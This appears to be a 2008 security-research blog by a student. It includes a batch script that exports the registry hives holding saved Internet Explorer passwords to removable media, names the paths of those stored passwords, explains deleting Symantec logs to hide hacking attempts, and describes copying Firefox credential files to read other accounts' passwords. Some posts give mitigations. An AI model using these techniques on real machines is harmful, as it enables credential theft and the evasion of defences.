There is nothing stopping an attacker from exporting IE password files to another machine. This would be useful if a program like Symantec were stopping you from using other tools on the local machine. All an attacker needs is a jump drive or other portable storage device. A script can be created that saves the encrypted registry values to their flash drive. Then they can import the passwords onto their own machine and use tools to decrypt the passwords. This is a copy of my script:

@echo off
REM search for storage2 in ie7
mkdir ie_info
mkdir ie_info\%computername%
regedit /E ie_info\%computername%\ie7.reg "HKEY_USERS" > NUL
regedit /E ie_info\%computername%\ie6.reg "HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider\" > NUL

The IE 7 passwords are stored in the following path:

HKEY_USERS\\Software\Microsoft\Internet Explorer\IntelliForms\Storage2

How to delete Symantec Antivirus Logs

Because there are no locks on Symantec logs, they can be easily deleted. The logs are stored in two different places in WinXp: \Documents and Settings\\Local Settings\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs and \Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\\Logs. This may not seem very important but it can be used by an attacker to cover up failed attempts to use hack tools on a machine.

Solution


Deny write and delete access to non-system/administrative users.

Tuesday, February 5, 2008

How to recover saved firefox passwords

There are many different software packages on the market designed to recover saved Firefox passwords. In this article I will explain how to view saved Firefox passwords without any special software. We will let Firefox do all the work for us.

Method 1:
If you have access to the windows account where the passwords are saved then the solution can be simple. Open Firefox and go to tools>options>security>show passwords. This will list all of the accounts with saved passwords. If you click the show passwords button it will display all of the correlating passwords.

Method 2:
This method is a little more advanced, but can be used to recover the passwords of any account on the machine. The passwords are saved in the directory \Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\. The files that store the passwords are signons2.txt and key3.db. If these files are taken and put in the above path on another machine they can be viewed using method 1. The password is recovered and no fancy software was needed.

Attack Mitigation:

Use a master password in your Firefox browser. Go to Firefox>tools>options>security and check the use master password box. This will cause Firefox to ask for a master password before displaying the saved passwords. There are some software packages capable of recovering the passwords even with the master password set, but this will stop casual hackers.

About me and My blog

My name is Craig Marshall. I am a student at BYU in the Information Systems department. I am interested in computer security and digital forensics. Upon graduation I will be working as a penetration tester for Ernst and Young's Advanced Security Center. This is a running log of my research and findings. (Note: All of my research is done in my own controlled test environment. I do not attack other people's machines!)